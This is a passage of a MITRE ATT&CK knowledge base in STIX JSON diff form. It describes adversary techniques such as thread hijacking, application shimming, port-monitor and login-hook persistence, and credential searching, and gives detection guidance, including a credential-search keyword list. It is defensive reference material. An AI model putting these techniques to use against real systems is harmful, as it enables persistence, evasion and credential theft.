"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1560/002", + "external_id": "T1560.002" + }, + { + "source_name": "PyPI RAR", + "description": "mkz. (2020). rarfile 3.1. Retrieved February 20, 2020.", + "url": "https://pypi.org/project/rarfile/" + }, + { + "source_name": "libzip", + "description": "D. Baron, T. Klausner. (2020). libzip. Retrieved February 20, 2020.", + "url": "https://libzip.org/" + }, + { + "source_name": "Zlib Github", + "description": "madler. (2017). zlib. Retrieved February 20, 2020.", + "url": "https://github.com/madler/zlib" + }, + { + "source_name": "Wikipedia File Header Signatures", + "description": "Wikipedia. (2016, March 31). List of file signatures. Retrieved April 22, 2016.", + "url": "https://en.wikipedia.org/wiki/List_of_file_signatures" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Thread Execution Hijacking", + "description": "Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. Thread Execution Hijacking is a method of executing arbitrary code in the address space of a separate live process. \n\nThread Execution Hijacking is commonly performed by suspending an existing process then unmapping/hollowing its memory, which can then be replaced with malicious code or the path to a DLL. A handle to an existing victim process is first created with native Windows API calls such as OpenThread. At this point the process can be suspended then written to, realigned to the injected code, and resumed via SuspendThread , VirtualAllocEx, WriteProcessMemory, SetThreadContext, then ResumeThread respectively.(Citation: Elastic Process Injection July 2017)\n\nThis is very similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) but targets an existing process rather than creating a process in a suspended state. \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via Thread Execution Hijacking may also evade detection from security products since the execution is masked under a legitimate process. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Application control", + "Anti-virus" + ], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--41d9846c-f6af-4302-a654-24bba2729bc6", + "created": "2020-01-14T01:28:32.166Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1055/003", + "external_id": "T1055.003" + }, + { + "source_name": "Elastic Process Injection July 2017", + "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", + "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Multilayer Encryption", + "description": "An adversary performs C2 communications using multiple layers of encryption, typically (but not exclusively) tunneling a custom encryption scheme within a protocol encryption scheme such as HTTPS or SMTPS.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "If malware uses [Standard Cryptographic Protocol](https://attack.mitre.org/techniques/T1032), SSL/TLS inspection can be used to detect command and control traffic within some encrypted communication channels. (Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation. (Citation: SEI SSL Inspection Risks) After SSL/TLS inspection, additional cryptographic analysis may be needed to analyze the second layer of encryption.\n\nWith [Custom Cryptographic Protocol](https://attack.mitre.org/techniques/T1024), if malware uses encryption with symmetric keys, it may be possible to obtain the algorithm and key from samples and use them to decode network traffic to detect malware communications signatures. (Citation: Fidelis DarkComet)\n\nIn general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--428ca9f8-0e33-442a-be87-f869cb4cf73e", + "created": "2017-05-31T21:31:01.315Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1079", + "external_id": "T1079" + }, + { + "source_name": "SANS Decrypting SSL", + "description": "Butler, M. (2013, November). Finding Hidden Threats by Decrypting SSL. Retrieved April 5, 2016.", + "url": "http://www.sans.org/reading-room/whitepapers/analyst/finding-hidden-threats-decrypting-ssl-34840" + }, + { + "source_name": "SEI SSL Inspection Risks", + "description": "Dormann, W. (2015, March 13). The Risks of SSL Inspection. Retrieved April 5, 2016.", + "url": "https://insights.sei.cmu.edu/cert/2015/03/the-risks-of-ssl-inspection.html" + }, + { + "source_name": "Fidelis DarkComet", + "description": "Fidelis Cybersecurity. (2015, August 4). Looking at the Sky for a DarkComet. Retrieved April 5, 2016.", + "url": "https://www.fidelissecurity.com/sites/default/files/FTA_1018_looking_at_the_sky_for_a_dark_comet.pdf" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-03-08T17:00:59.133Z", + "name": "Masquerading", + "description": "Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.\n\nRenaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Oleg Kolesnikov, Securonix", + "Nick Carr, Mandiant", + "David Lu, Tripwire", + "Felipe Espósito, @Pr0teus", + "Elastic", + "Bartosz Jerzman", + "Goldstein Menachem" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.\n\nIf file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Elastic Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)\n\nLook for indications of common characters that may indicate an attempt to trick users into misidentifying the file type, such as a space as the last character of a file name or the right-to-left override characters\"\\u202E\", \"[U+202E]\", and \"%E2%80%AE”.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Containers" + ], + "x_mitre_version": "1.7", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Application Control" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0", + "created": "2017-05-31T21:30:38.511Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1036", + "external_id": "T1036" + }, + { + "source_name": "Twitter ItsReallyNick Masquerading Update", + "description": "Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading. Retrieved April 22, 2019.", + "url": "https://twitter.com/ItsReallyNick/status/1055321652777619457" + }, + { + "source_name": "Elastic Masquerade Ball", + "description": "Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball. Retrieved October 31, 2016.", + "url": "https://www.elastic.co/blog/how-hunt-masquerade-ball" + }, + { + "source_name": "LOLBAS Main Site", + "description": "LOLBAS. (n.d.). Living Off The Land Binaries and Scripts (and also Libraries). Retrieved February 10, 2020.", + "url": "https://lolbas-project.github.io/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Application Shimming", + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Elastic Process Injection July 2017)\n\nWithin the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses hooking to redirect the code as necessary in order to communicate with the OS. \n\nA list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:\n\n* %WINDIR%\\AppPatch\\sysmain.sdb and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\installedsdb\n\nCustom databases are stored in:\n\n* %WINDIR%\\AppPatch\\custom & %WINDIR%\\AppPatch\\AppPatch64\\Custom and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\custom\n\nTo keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress).\n\nUtilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc. (Citation: FireEye Application Shimming) Shims can also be abused to establish persistence by continuously being invoked by affected programs.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "There are several public tools available that will detect shims that are currently available (Citation: Black Hat 2015 App Shim):\n\n* Shim-Process-Scanner - checks memory of every running process for any shim flags\n* Shim-Detector-Lite - detects installation of custom shim databases\n* Shim-Guard - monitors registry for any shim installations\n* ShimScanner - forensic tool to find active shims in memory\n* ShimCacheMem - Volatility plug-in that pulls shim cache from memory (note: shims are only cached after reboot)\n\nMonitor process execution for sdbinst.exe and command-line arguments for potential indications of application shim abuse.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--42fe883a-21ea-4cfb-b94a-78b6476dcc83", + "created": "2020-01-24T14:56:24.231Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1546/011", + "external_id": "T1546.011" + }, + { + "source_name": "Elastic Process Injection July 2017", + "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", + "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" + }, + { + "source_name": "FireEye Application Shimming", + "description": "Ballenthin, W., Tomczak, J.. (2015). The Real Shim Shary. Retrieved May 4, 2020.", + "url": "http://files.brucon.org/2015/Tomczak_and_Ballenthin_Shims_for_the_Win.pdf" + }, + { + "source_name": "Black Hat 2015 App Shim", + "description": "Pierce, Sean. (2015, November). Defending Against Malicious Application Compatibility Shims. Retrieved June 22, 2017.", + "url": "https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-15T21:33:12.892Z", + "name": "Unsecured Credentials", + "description": "Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. [Bash History](https://attack.mitre.org/techniques/T1552/003)), operating system or application-specific repositories (e.g. [Credentials in Registry](https://attack.mitre.org/techniques/T1552/002)), or other specialized files/artifacts (e.g. [Private Keys](https://attack.mitre.org/techniques/T1552/004)).(Citation: Brining MimiKatz to Unix)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Austin Clark, @c2defense" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "While detecting adversaries accessing credentials may be difficult without knowing they exist in the environment, it may be possible to detect adversary use of credentials they have obtained. Monitor the command-line arguments of executing processes for suspicious words or regular expressions that may indicate searching for a password (for example: password, pwd, login, secure, or credentials). See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.\n\nMonitor for suspicious file access activity, specifically indications that a process is reading multiple files in a short amount of time and/or using command-line arguments indicative of searching for credential material (ex: regex patterns). These may be indicators of automated/scripted credential access behavior.\n\nMonitoring when the user's .bash_history is read can help alert to suspicious activity. While users do typically rely on their history of commands, they often access this history through other utilities like \"history\" instead of commands like cat ~/.bash_history.\n\nAdditionally, monitor processes for applications that can be used to query the Registry, such as [Reg](https://attack.mitre.org/software/S0075), and collect command parameters that may indicate credentials are being searched. Correlate activity with related suspicious behavior that may indicate an active intrusion to reduce false positives.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Azure AD", + "Office 365", + "SaaS", + "IaaS", + "Linux", + "macOS", + "Google Workspace", + "Containers", + "Network" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517", + "created": "2020-02-04T12:47:23.631Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1552", + "external_id": "T1552" + }, + { + "source_name": "Brining MimiKatz to Unix", + "description": "Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing Mimikatz et al to UNIX. Retrieved October 13, 2021.", + "url": "https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-12T02:49:39.980Z", + "name": "Port Monitors", + "description": "Adversaries may use port monitors to run an adversary supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.(Citation: AddMonitor) This DLL can be located in C:\\Windows\\System32 and will be loaded and run by the print spooler service, `spoolsv.exe`, under SYSTEM level permissions on boot.(Citation: Bloxham) \n\nAlternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to the `Driver` value of an existing or new arbitrarily named subkey of HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors. The Registry key contains entries for the following:\n\n* Local Port\n* Standard TCP/IP Port\n* USB Monitor\n* WSD Port\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Stefan Kanthak", + "Travis Smith, Tripwire", + "Harun Küßner" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor process API calls to AddMonitor.(Citation: AddMonitor) Monitor DLLs that are loaded by spoolsv.exe for DLLs that are abnormal. New DLLs written to the System32 directory that do not correlate with known good software or patching may be suspicious. \n\nMonitor Registry writes to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors, paying particular attention to changes in the \"Driver\" subkey. Run the Autoruns utility, which checks for this Registry key as a persistence mechanism.(Citation: TechNet Autoruns)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_effective_permissions": [ + "SYSTEM" + ], + "x_mitre_permissions_required": [ + "SYSTEM", + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--43881e51-ac74-445b-b4c6-f9f9e9bf23fe", + "created": "2020-01-24T19:46:27.750Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1547/010", + "external_id": "T1547.010" + }, + { + "source_name": "Bloxham", + "description": "Bloxham, B. (n.d.). Getting Windows to Play with Itself [PowerPoint slides]. Retrieved November 12, 2014.", + "url": "https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf" + }, + { + "source_name": "AddMonitor", + "description": "Microsoft. (n.d.). AddMonitor function. Retrieved November 12, 2014.", + "url": "http://msdn.microsoft.com/en-us/library/dd183341" + }, + { + "source_name": "TechNet Autoruns", + "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", + "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Clear Mailbox Data", + "description": "Adversaries may modify mail and mail application data to remove evidence of their activity. Email applications allow users and other programs to export and delete mailbox data via command line tools or use of APIs. Mail application data can be emails, email metadata, or logs generated by the application or operating system, such as export requests. \n\nAdversaries may manipulate emails and mailbox data to remove logs, artifacts, and metadata, such as evidence of [Phishing](https://attack.mitre.org/techniques/T1566)/[Internal Spearphishing](https://attack.mitre.org/techniques/T1534), [Email Collection](https://attack.mitre.org/techniques/T1114), [Mail Protocols](https://attack.mitre.org/techniques/T1071/003) for command and control, or email-based exfiltration such as [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). For example, to remove evidence on Exchange servers adversaries have used the ExchangePowerShell [PowerShell](https://attack.mitre.org/techniques/T1059/001) module, including Remove-MailboxExportRequest to remove evidence of mailbox exports.(Citation: Volexity SolarWinds)(Citation: ExchangePowerShell Module) On Linux and macOS, adversaries may also delete emails through a command line utility called mail or use [AppleScript](https://attack.mitre.org/techniques/T1059/002) to interact with APIs on macOS.(Citation: Cybereason Cobalt Kitty 2017)(Citation: mailx man page)\n\nAdversaries may also remove emails and metadata/headers indicative of spam or suspicious activity (for example, through the use of organization-wide transport rules) to reduce the likelihood of malicious emails being detected by security products.(Citation: Microsoft OAuth Spam 2022)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Liran Ravich, CardinalOps" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Office 365", + "Google Workspace" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--438c967d-3996-4870-bfc2-3954752a1927", + "created": "2022-07-08T21:04:03.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1070/008", + "external_id": "T1070.008" + }, + { + "source_name": "Volexity SolarWinds", + "description": "Cash, D. et al. (2020, December 14). Dark Halo Leverages SolarWinds Compromise to Breach Organizations. Retrieved December 29, 2020.", + "url": "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/" + }, + { + "source_name": "Cybereason Cobalt Kitty 2017", + "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.", + "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf" + }, + { + "source_name": "mailx man page", + "description": "Michael Kerrisk. (2021, August 27). mailx(1p) — Linux manual page. Retrieved June 10, 2022.", + "url": "https://man7.org/linux/man-pages/man1/mailx.1p.html" + }, + { + "source_name": "ExchangePowerShell Module", + "description": "Microsoft. (2017, September 25). ExchangePowerShell. Retrieved June 10, 2022.", + "url": "https://docs.microsoft.com/en-us/powershell/module/exchange/?view=exchange-ps#mailboxes" + }, + { + "source_name": "Microsoft OAuth Spam 2022", + "description": "Microsoft. (2023, September 22). Malicious OAuth applications abuse cloud email services to spread spam. Retrieved March 13, 2023.", + "url": "https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Login Hook", + "description": "Adversaries may use a Login Hook to establish persistence executed upon user logon. A login hook is a plist file that points to a specific script to execute with root privileges upon user logon. The plist file is located in the /Library/Preferences/com.apple.loginwindow.plist file and can be modified using the defaults command-line utility. This behavior is the same for logout hooks where a script can be executed upon user logout. All hooks require administrator permissions to modify or create hooks.(Citation: Login Scripts Apple Dev)(Citation: LoginWindowScripts Apple Dev) \n\nAdversaries can add or insert a path to a malicious script in the com.apple.loginwindow.plist file, using the LoginHook or LogoutHook key-value pair. The malicious script is executed upon the next user login. If a login hook already exists, adversaries can add additional commands to an existing login hook. There can be only one login and logout hook on a system at a time.(Citation: S1 macOs Persistence)(Citation: Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11 version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties. Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "2.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--43ba2b05-cf72-4b6c-8243-03a4aba41ee0", + "created": "2020-01-10T16:01:15.995Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1037/002", + "external_id": "T1037.002" + }, + { + "source_name": "Login Scripts Apple Dev", + "description": "Apple. (2016, September 13). Customizing Login and Logout. Retrieved April 1, 2022.", + "url": "https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html" + }, + { + "source_name": "LoginWindowScripts Apple Dev", + "description": "Apple. (n.d.). LoginWindowScripts. Retrieved April 1, 2022.", + "url": "https://developer.apple.com/documentation/devicemanagement/loginwindowscripts" + }, + { + "source_name": "Wardle Persistence Chapter", + "description": "Patrick Wardle. (n.d.). Chapter 0x2: Persistence. Retrieved April 13, 2022.", + "url": "https://taomm.org/PDFs/vol1/CH%200x02%20Persistence.pdf" + }, + { + "source_name": "S1 macOs Persistence", + "description": "Stokes, P. (2019, July 17). How Malware Persists on macOS. Retrieved March 27, 2020.", + "url": "https://www.sentinelone.com/blog/how-malware-persists-on-macos/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-01T02:28:45.147Z", + "name": "Content Injection", + "description": "Adversaries may gain access and continuously communicate with victims by injecting malicious content into systems through online network traffic. Rather than luring victims to malicious payloads hosted on a compromised website (i.e., [Drive-by Target](https://attack.mitre.org/techniques/T1608/004) followed by [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)), adversaries may initially access victims through compromised data-transfer channels where they can manipulate traffic and/or inject their own content. These compromised online network channels may also be used to deliver additional payloads (i.e., [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) and other data to already compromised systems.(Citation: ESET MoustachedBouncer)\n\nAdversaries may inject content to victim systems in various ways, including:\n\n* From the middle, where the adversary is in-between legitimate online client-server communications (**Note:** this is similar but distinct from [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557), which describes AiTM activity solely within an enterprise environment) (Citation: Kaspersky Encyclopedia MiTM)\n* From the side, where malicious content is injected and races to the client as a fake response to requests of a legitimate online server (Citation: Kaspersky ManOnTheSide)\n\nContent injection is often the result of compromised upstream communication channels, for example at the level of an internet service provider (ISP) as is the case with \"lawful interception.\"(Citation: Kaspersky ManOnTheSide)(Citation: ESET MoustachedBouncer)(Citation: EFF China GitHub Attack)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "initial-access" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--43c9bc06-715b-42db-972f-52d25c09a20c", + "created": "2023-09-01T21:03:13.406Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1659", + "external_id": "T1659" + }, + { + "source_name": "EFF China GitHub Attack", + "description": "Budington, B. (2015, April 2). China Uses Unencrypted Websites to Hijack Browsers in GitHub Attack. Retrieved September 1, 2023.", + "url": "https://www.eff.org/deeplinks/2015/04/china-uses-unencrypted-websites-to-hijack-browsers-in-github-attack" + }, + { + "source_name": "ESET MoustachedBouncer", + "description": "Faou, M. (2023, August 10). MoustachedBouncer: Espionage against foreign diplomats in Belarus. Retrieved September 1, 2023.", + "url": "https://www.welivesecurity.com/en/eset-research/moustachedbouncer-espionage-against-foreign-diplomats-in-belarus/" + }, + { + 